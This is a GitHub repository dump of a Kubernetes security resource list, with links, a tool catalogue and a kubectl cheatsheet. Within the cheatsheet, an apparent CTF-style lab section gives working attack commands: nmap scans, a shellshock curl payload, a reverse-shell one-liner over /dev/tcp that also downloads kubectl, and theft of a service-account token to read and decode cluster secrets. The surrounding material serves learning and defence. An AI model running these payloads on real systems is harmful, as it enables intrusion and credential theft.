├── art ├── HackingKubernetes.png ├── ports_kubernetes.png ├── HackingKubernetes0.jpg └── kubernetes_arquitecture.png ├── pdf ├── Learn by Hacking.zip └── k8s_cheatsheet.md ├── LICENSE └── README.md /art/HackingKubernetes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/HackingKubernetes.png -------------------------------------------------------------------------------- /art/ports_kubernetes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/ports_kubernetes.png -------------------------------------------------------------------------------- /pdf/Learn by Hacking.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/pdf/Learn by Hacking.zip -------------------------------------------------------------------------------- /art/HackingKubernetes0.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/HackingKubernetes0.jpg -------------------------------------------------------------------------------- /art/kubernetes_arquitecture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BEPb/HackingKubernetes/HEAD/art/kubernetes_arquitecture.png -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Andrej Marinchenko 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /pdf/k8s_cheatsheet.md: -------------------------------------------------------------------------------- 1 | This guide has been created to help engineers debug applications that are deployed into Kubernetes and not behaving correctly. 2 | 3 | ## Pod & Container Introspection 4 | 5 | | Command | Description | 6 | | ------------------------------------------------------------ | ------------------------------------------------------------ | 7 | | `kubectl get pods` | lists the current pods in the current namespace | 8 | | `kubectl get pods -w` | watches pods continuously | 9 | | `kubectl describe pod ` | describe pod | 10 | | `kubectl get rc` | list the replication controllers | 11 | | `kubectl get services` or `kubectl get svc` | list the services in the current namespace | 12 | | `kubectl describe service ` or `kubectl describe svc ` | describe service | 13 | | `kubectl delete pod ` | delete pod | 14 | | `kubectl get pods -o wide –w` | watch pods continuously and show
info such as IP addresses & nodes provisioned on | 15 | 16 | ## Cluster Introspection 17 | 18 | | Command | Description | 19 | | :----------------------------- | :----------------------------------------------------------- | 20 | | `kubectl version` | get version info | 21 | | `kubectl cluster-info` | get cluster info | 22 | | `kubectl config view` | get cluster config | 23 | | `kubectl describe node ` | output info about a node | 24 | | `kubectl get nodes –w` | watch nodes continuously | 25 | | `kubectl get nodes -o wide` | gives a detailed view of nodes - including internal & external IP address | 26 | 27 | ## Debugging 28 | 29 | | Command | Description | 30 | | ------------------------------------------------------------ | ------------------------------------------------------------ | 31 | | `kubectl exec -ti [-c ]` | execute command on pod , optionally on a
given container | 32 | | `klog [-c ]` or
`kubectl logs -f [-c `] | get logs of a given pod or optionally container | 33 | | | | 34 | | | | 35 | 36 | ## Networking 37 | 38 | | Command | Description | 39 | | ------------------------------------------------------------ | ----------------------------------------- | 40 | | `kubectl exec -ti -- /bin/sh -c "curl -v
telnet://:"` | testing TCP connectivity between services | 41 | | | | 42 | | | | 43 | | | | 44 | 45 | ## Other resources 46 | 47 | - check whether an action is allowed in your Kubernetes cluster 48 | 49 | Use `amicontained` to find out what container runtime you're using as well as what capabilities the your container has. 50 | 51 | ``` 52 | # Export the sha256sum for verification. 53 | $ export AMICONTAINED_SHA256="4e32545f68f25bcbcd4cce82743e916a054e1686df44fab68420fc9f94f80b21" 54 | 55 | # Download and check the sha256sum. 56 | $ curl -fSL "https://github.com/genuinetools/amicontained/releases/download/v0.4.7/amicontained-linux-amd64" -o "/usr/local/bin/amicontained" \ 57 | && echo "${AMICONTAINED_SHA256} /usr/local/bin/amicontained" | sha256sum -c - \ 58 | && chmod a+x "/usr/local/bin/amicontained" 59 | 60 | $ echo "amicontained installed!" 61 | 62 | # Run it! 63 | $ amicontained -h 64 | ``` 65 | 66 | Add these functions to your environment so that you can scan for open ports 67 | 68 | ``` sudo apt-get update 69 | sudo apt-get install nmap 70 | nmap-kube () 71 | { 72 | nmap --open -T4 -A -v -Pn -p 443,2379,4194,6782-6784,6443,8443,8080,9099,10250,10255,10256 "${@}" 73 | } 74 | nmap-kube-discover () { 75 | local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,'); 76 | local SERVER_RANGES=" "; 77 | SERVER_RANGES+="10.0.0.1 "; 78 | SERVER_RANGES+="10.0.1.* "; 79 | SERVER_RANGES+="10.*.0-1.* "; 80 | nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}" 81 | } 82 | nmap-kube-discover 83 | ``` 84 | 85 | Part 1: compromise via shellshock 86 | 87 | Useful commands for finding open ports: 88 | 89 | ``` 90 | command nmap -Pn -T4 -F --open 91 | # scanning every port, more is open 92 | command nmap -Pn -T4 --open -p 0-65535 93 | command nmap -Pn -T4 --open -p 30081 94 | ``` 95 | 96 | 1. Check shellshock 97 | 98 | ``` 99 | curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "cat /etc/passwd"' 100 | ``` 101 | 102 | 2. create a control server to use as a reverse shell endpoint 103 | 104 | this requires any node with a public IP (a digital ocean server would do) 105 | 106 | ``` 107 | # replace `controlplane` with a host that you can SSH to 108 | ssh controlplane ip a 109 | 110 | # replace 1234 with a port that is routable on the host you have SSH'd into 111 | while :; do ssh controlplane ncat --listen 1234 --output $(mktemp /tmp/hack-XXXX.log); done 112 | ``` 113 | 114 | 3. shellshock in 115 | 116 | 117 | 118 | ``` 119 | curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "echo hello"' 120 | ``` 121 | 122 | Hardcore version: 123 | 124 | ``` 125 | while :; do curl http://:30081/cgi-bin/stats -H 'user-agent: () { :; }; echo; echo; 2>&1 /bin/bash -c "test -f /tmp/k || wget -O /tmp/k https://storage.googleapis.com/kubernetes-release/release/v1.11.2/bin/linux/amd64/kubectl && chmod +x /tmp/k && /tmp/k version; df -h; while :; do nohup bash -i >& /dev/tcp//1234 0>&1; sleep 1; done"'; done 126 | ``` 127 | 128 | Part 2: 129 | 130 | Kubectl SA: steal secret with ssh password in (flag) 131 | 132 | ### Steps 133 | 134 | 1. on the control server, or via individual shellshock commands: 135 | 136 | Search for secrets: 137 | 138 | ``` 139 | df -h 140 | cat /run/secrets/kubernetes.io/serviceaccount/token; echo 141 | 142 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get nodes 143 | 144 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify auth can-i get secrets --namespace kube-system 145 | ``` 146 | 147 | 2. pull secrets from the API server for this namespace (there's a service account mounted that can read kube-system) 148 | 149 | ``` 150 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secrets -n shellshock 151 | ``` 152 | 153 | 3. we've found secrets, now decode them 154 | 155 | > first way requires manual base64 decode, second is a one-liner 156 | 157 | ``` 158 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --request-timeout 5s --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -o yaml -n shellshock 159 | 160 | /tmp/k --token "$(cat /run/secrets/kubernetes.io/serviceaccount/token)" --server https://kubernetes.default.svc --insecure-skip-tls-verify get secret my-secret -n shellshock -o 'go-template={{index .data "ssh_password"}}' | base64 -d; echo 161 | ``` 162 | 163 | 4. find password for ssh server in flag 164 | 165 | 5. write password in local file to win (or just tell ControlPlane!) TODO(low): write test for this 166 | 167 | ``` 168 | echo 'What kind of plane is it?' > /tmp/flag 169 | ``` -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 |

12 |
13 | 14 | logo 15 | 16 | # HackingKubernetes 17 |
18 | 19 | HackingKubernetes - is a valuable resource and a leading container management system in development pipelines across 20 | the world, but it’s not exempt from malicious attacks. Using Kubernetes requires a deep understanding of Kubernetes’ 21 | environment—including the different vulnerabilities you can be exposed to while creating, deploying, or running 22 | applications in your clusters. 23 | 24 | Since your Kubernetes cluster is likely one of your most valuable cloud resources, it needs to be protected. 25 | Kubernetes’ security addresses the safety of your cloud, application clusters, containers, apps and code. Although 26 | Kubernetes provides inherent security advantages, bolstering your defensive tactics is crucial to protecting your 27 | system against hackers and other cybersecurity threats. 28 | 29 | ## Intro 30 | - [OWASP Kubernetes Top Ten](https://owasp.org/www-project-kubernetes-top-ten/) 31 | - [Kubernetes adoption, security, and market trends report](https://www.redhat.com/en/resources/kubernetes-adoption-security-market-trends-overview) 32 | 33 | 34 | ### Official documentation kubernetes 35 | - [Kubernetes Documentation](https://kubernetes.io/docs/home/) 36 | - [Github repo kubernetes](https://github.com/kubernetes/kubernetes/) 37 | - [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/) 38 | - [Security kubernetes](https://kubernetes.io/docs/concepts/security/) 39 | - [Docker Engine security](https://docs.docker.com/engine/security/) 40 | - 41 | 42 | ### Security resources 43 | - [Container Security Site](https://www.container-security.site/) 44 | - [KubeCon + CloudNativeCon Europe 2024](https://www.youtube.com/playlist?list=PLj6h78yzYM2N8nw1YcqqKveySH6_0VnI0) 45 | - [Cloud native computing foundation](https://www.cncf.io/) 46 | 47 | ### Intro from TryHackMe (free) 48 | - [Intro to IaC](https://tryhackme.com/r/room/introtoiac) 49 | - [Intro to IaC with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Intro%20to%20IaC.md) 50 | - [Microservices Architectures](https://tryhackme.com/r/room/microservicearchitectures) 51 | - [Microservices Architectures with answers](https://github.com/BEPb/tryhackme/blob/master/01.easy/Microservices%20Architectures.md) 52 | - [Kubernetes for Everyone](https://tryhackme.com/r/room/kubernetesforyouly) 53 | - [Kubernetes for Everyone with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Kubernetes%20for%20Everyone.md) 54 | - [K8s Best Security Practices](https://tryhackme.com/r/room/k8sbestsecuritypractices) 55 | - [K8s Best Security Practices with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/K8s%20Best%20Security%20Practices.md) 56 | - [Cluster Hardening](https://tryhackme.com/r/room/clusterhardening) 57 | - [Cluster Hardening with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Cluster%20Hardening.md) 58 | - [Frank & Herby make an app](https://tryhackme.com/r/room/frankandherby) 59 | - [Frank & Herby make an app with answers](https://github.com/BEPb/tryhackme/blob/master/02.Medium/Frank%20%26%20Herby%20make%20an%20app.md) 60 | 61 | ### Intro from vmware 62 | - [What is Kubernetes?](https://www.vmware.com/topics/kubernetes) 63 | - [What is DevSecOps?](https://tanzu.vmware.com/devsecops) 64 | - [What is Kubernetes Architecture?](https://www.vmware.com/topics/kubernetes-architecture) 65 | - [What are Kubernetes Services?](https://www.vmware.com/topics/kubernetes-services) 66 | - [What is Kubernetes Security?](https://www.vmware.com/topics/kubernetes-security) 67 | - [What is Kubernetes Networking?](https://www.vmware.com/topics/kubernetes-networking) 68 | - [What are Kubernetes Clusters vs. Nodes vs. Pods vs. Containers vs. Containerized Applications?](https://www.vmware.com/topics/components-kubernetes) 69 | - [What are Kubernetes Pods?](https://www.vmware.com/topics/kubernetes-pods) 70 | 71 | ### Intro fromm yarsalabs 72 | - [A Deep Dive Into Kubernetes Pods](https://blog.yarsalabs.com/a-deep-dive-into-kubernetes-pods/) 73 | - [Installing the Components required for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part1/) 74 | - [TLS Certificates Management for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part2/) 75 | - [ETCD Server Setup for a Kubernetes Cluster](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part3/) 76 | - [Generating Kubernetes Configuration Files for Authentication](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part4/) 77 | - [Creating the Kubernetes Control Plane](https://blog.yarsalabs.com/kubernetes-cluster-from-scratch-part5/) 78 | 79 | 80 | ### Cheatsheets 81 | 82 | - [quick reference](https://kubernetes.io/docs/reference/kubectl/quick-reference/) 83 | - [k8s_cheatsheet.md](https://github.com/BEPb/HackingKubernetes/blob/master/pdf/k8s_cheatsheet.md) 84 | - [k8s-cheat-sheet](https://encore.dev/resources/k8s-cheat-sheet) 85 | - [kubernetes-cheat-sheet](https://www.mirantis.com/blog/kubernetes-cheat-sheet) 86 | - [Kubernetes Security Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-data) 87 | 88 | arquitecture 89 | ports 90 | 91 | ### Atricles How to Hack Kubernetes 92 | - [How to Hack Kubernetes (and How to Protect It)](https://goteleport.com/blog/how-to-hack-kubernetes/) 93 | - [Securing Kubernetes Clusters by Eliminating Risky Permissions](https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions) 94 | - [Kubernetes Pentest Methodology Part 1](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1) 95 | - [Kubernetes Pentest Methodology Part 2](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2) 96 | - [Kubernetes Pentest Methodology Part 3](https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3) 97 | - [Eight Ways to Create a Pod](https://www.cyberark.com/resources/threat-research-blog/eight-ways-to-create-a-pod) 98 | - [Kubernetes Pod Escape Using Log Mounts](https://www.aquasec.com/blog/kubernetes-security-pod-escape-log-mounts/) 99 | - [The Route to Root: Container Escape Using Kernel Exploitation](https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation) 100 | - [Attacking Kubernetes clusters using the Kubelet API](https://faun.pub/attacking-kubernetes-clusters-using-the-kubelet-api-abafc36126ca) 101 | - [Threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2020/04/02/attack-matrix-kubernetes/) 102 | - [Secure containerized environments with updated threat matrix for Kubernetes](https://www.microsoft.com/en-us/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/) 103 | - [Introduction to GKE Kubelet TLS Bootstrap Privilege Escalation](https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-privilege-escalation/) 104 | - [Bad Pods: Kubernetes Pod Privilege Escalation](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation) 105 | - [Bad Pods github](https://github.com/BishopFox/badPods) 106 | - [Hacking Kubelet on Google Kubernetes Engine](https://www.4armed.com/blog/hacking-kubelet-on-gke/) 107 | 108 | ### PDF 109 | - [Learn by Hacking](https://github.com/calinah/learn-by-hacking-kccn/blob/master/Learn%20by%20Hacking.pdf) 110 | - 111 | 112 | ### Kubernetes Security 113 | - [Kubernetes Security Best Practices everyone must follow](https://www.cncf.io/blog/2019/01/14/9-kubernetes-security-best-practices-everyone-must-follow) 114 | - [Securing a Cluster](https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster) 115 | - [Security Best Practices for Kubernetes Deployment](https://kubernetes.io/blog/2016/08/security-best-practices-kubernetes-deployment) 116 | - [Kubernetes Security Best Practices](https://phoenixnap.com/kb/kubernetes-security-best-practices) 117 | - [Kubernetes Security 101: Risks and 29 Best Practices](https://www.stackrox.com/post/2020/05/kubernetes-security-101) 118 | - [15 Kubernetes security best practice to secure your cluster](https://www.mobilise.cloud/15-kubernetes-security-best-practice-to-secure-your-cluster) 119 | - [The Ultimate Guide to Kubernetes Security](https://neuvector.com/container-security/kubernetes-security-guide) 120 | - [11 Ways (Not) to Get Hacked](https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked) 121 | - [12 Kubernetes configuration best practices](https://www.stackrox.com/post/2019/09/12-kubernetes-configuration-best-practices/#6-securely-configure-the-kubernetes-api-server) 122 | - [A Practical Guide to Kubernetes Logging](https://logz.io/blog/a-practical-guide-to-kubernetes-logging) 123 | - [Kubernetes Web UI (Dashboard)](https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard) 124 | - [OPEN POLICY AGENT: CLOUD-NATIVE AUTHORIZATION](https://blog.styra.com/blog/open-policy-agent-authorization-for-the-cloud) 125 | - [Introducing Policy As Code: The Open Policy Agent (OPA) ](https://www.magalix.com/blog/introducing-policy-as-code-the-open-policy-agent-opa) 126 | - [What service mesh provides](https://aspenmesh.io/wp-content/uploads/2019/10/AspenMesh_CompleteGuide.pdf) 127 | - [Three Technical Benefits of Service Meshes and their Operational Limitations, Part 1](https://glasnostic.com/blog/service-mesh-istio-limits-and-benefits-part-1) 128 | - [Open Policy Agent: What Is OPA and How It Works (Examples)](https://spacelift.io/blog/what-is-open-policy-agent-and-how-it-works) 129 | - [Send Kubernetes Metrics To Kibana and Elasticsearch](https://logit.io/sources/configure/kubernetes/) 130 | - [Kubernetes Security Checklist](https://kubernetes.io/docs/concepts/security/security-checklist/) 131 | 132 |

Container & Kubernetes Security Tools

This is a list of open source tools which help with areas related to Container security. Some of the tools in this list don’t fit neatly into a specific category or categories, so they’re listed with the closest option.

Container Attack Surface Assessment & Breakout Tools

Useful tools to run inside a container to assess the sandbox that’s in use, and exploit some common breakout issues.

  • deepce - Docker Enumeration, Escalation of Privileges and Container Escapes
  • CDK - Container and Kubernetes auditing and breakout tool.

Container Vulnerability Scanning Tools

  • Trivy - Vulnerability and IaC scanner
  • Grype - Container vulnerability scanner
  • clair - Container vulnerability scanner
  • Docker Scout - Container Vulnerability scanner
  • dep-scan - Vulnerability and mis-configuration scanner
  • Neuvector Scanner - Container Vulnerability Scanning Tool.

IaC Scanning Tools that cover container formats

  • Trivy - Vulnerability and IaC scanner
  • Checkov - IaC scanner
  • KICS - IaC scanner
  • dep-scan - Vulnerability and mis-configuration scanner
  • Terrascan - IAC Scanner for various formats including Docker and Kubernetes
  • hadolint - Docker file linter

Docker Security Tools

  • docker bench - Docker CIS Benchmark assessment tool
  • Dockle - Container Image Linter
  • cnspec - Assessment tool for multiple platforms including Docker and Kubernetes

Container Runtime Security Tools

  • Tracee. Container runtime security tooling
  • Falco. Container runtime security tooling
  • Kubearmor. Container runtime security enforcement tool
  • Tetragon. Container runtime security tool

Container Registry Tools

  • regclient - Another tool for interacting with container registries
  • crane - Tool for interacting with Container registries.
  • skopeo - Tool for interaction with Container registries

Container Image Tools

  • Dive - Tool for exploring Container image layers

Kubernetes Tools

RBAC Assessment Tools

  • rbac-tool - RBAC Tool for Kubernetes
  • kubiScan - Tool to scan Kubernetes clusters for risky permissions
  • krane - Kubernetes RBAC static analysis & visualisation tool
  • eathar - Kubernetes security assessment tool focusing on workload security and RBAC.

Kubernetes Security Auditing Tools

  • kube-bench - Tool to assess compliance with the CIS benchmark for various Kubernetes distributions
  • kubescape - Kubernetes security assessment tool
  • kubeaudit - Kubernetes security assessment tool focusing on workload security
  • kubesec - Kubernetes security assessment tool focusing on workload security
  • kubescore - Kubernetes security and reliability assessment tool focusing on workload security.
  • eathar - Kubernetes security assessment tool focusing on workload security and RBAC.
  • popeye - Kubernetes cluster scanner, looking for possible mis-configurations.
  • cnspec - Assessment tool for multiple platforms including Docker and Kubernetes

Kubernetes Penetration Testing Tools

  • peirates - Kubernetes container breakout tool
  • kdigger - Kubernetes breakout/discovery tool
  • teisteanas - Tool to create kubeconfig files based on the CertificateSigningRequest API.
  • tòcan - Tool to create kubeconfig files based on the TokenRequest API.
  • MKAT - Managed Kubernetes Auditing Tool. Focuses on exploring security issues in managed Kubernetes (e.g. EKS)
  • Kubehound - KubeHound creates a graph of attack paths in a Kubernetes cluster
  • IceKube - Kubernetes attack path evaluation tool.
  • namespacehound - Tool to test a cluster for possible namespace breakouts where multi-tenancy is in use.

Kubelet Tools

  • kubeletctl - This is a good tool to automate the process of assessing a kubelet instance. If the instance is vulnerable it can also carry out some exploit tasks
  • kubelet dumper - PoC tool to dump Kubelet configurations for review.

etcd Tools

  • auger - Tool for decoding information pulled directly from the etcd database

Security Observability Tools

Training Tools

If you’re looking to practice with some of the tools here, in a safe environment, there are projects to help with that.

Kubernetes Honeypot projects

Kubernetes Security Improvement Tools

Deprecated/Unmaintained Tools

Inevitably over time, some tools will become unmaintained and deprecated. Whilst they may still work ok, caution is needed. If I’ve listed you here and you’re not deprecated just open an issue to move it back :)

  • kube-hunter - Tool to test and exploit standard Kubernetes Security Vulnerabilities
  • kubectl-who-can - Tool that lets you ask “who can” do things in RBAC, e.g. who can get secrets
  • rakkess - Shows the RBAC permissions available to a user as a list
  • rback - tool for graphical representation of RBAC permissions in a kubernetes cluster
  • amicontained - will show you information about the container runtime and rights you have
  • ConMachi - Pentester focused container attack surface assessment tool
  • botb - Container breakout assessment tool. Can automatically exploit common issues like the Docker socket mount
  • keyctl-unmask - Tool that specifically focuses on grabbing kernel keyring entries from containers that allow the keyctl syscall
  • go-pillage-registries - Tool to search the manifests and configuration for images in a registry for potentially sensitive information
  • reg - Tool for interacting with Container registries
  • Whaler - Tool to reverse Docker images into Dockerfiles.
  • RBAC Police - RBAC policy evaluation.
  • kubestrike - Security auditing tool for Kubernetes looks at Authenticated and unauthenticated scanning
  • kubestroyer - Kubernetes pentesting tool.
  • kubestalk - Black Box Kubernetes Pentesting Tool.
  • kubedagger - Kubernetes offensive framework built in eBPF.
  • kubesploit - Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang, focused on containerized environments
  • k8spot - Kubernetes honeypot.
133 | 134 | 135 | 136 | logo 137 | 138 | --------------------------------------------------------------------------------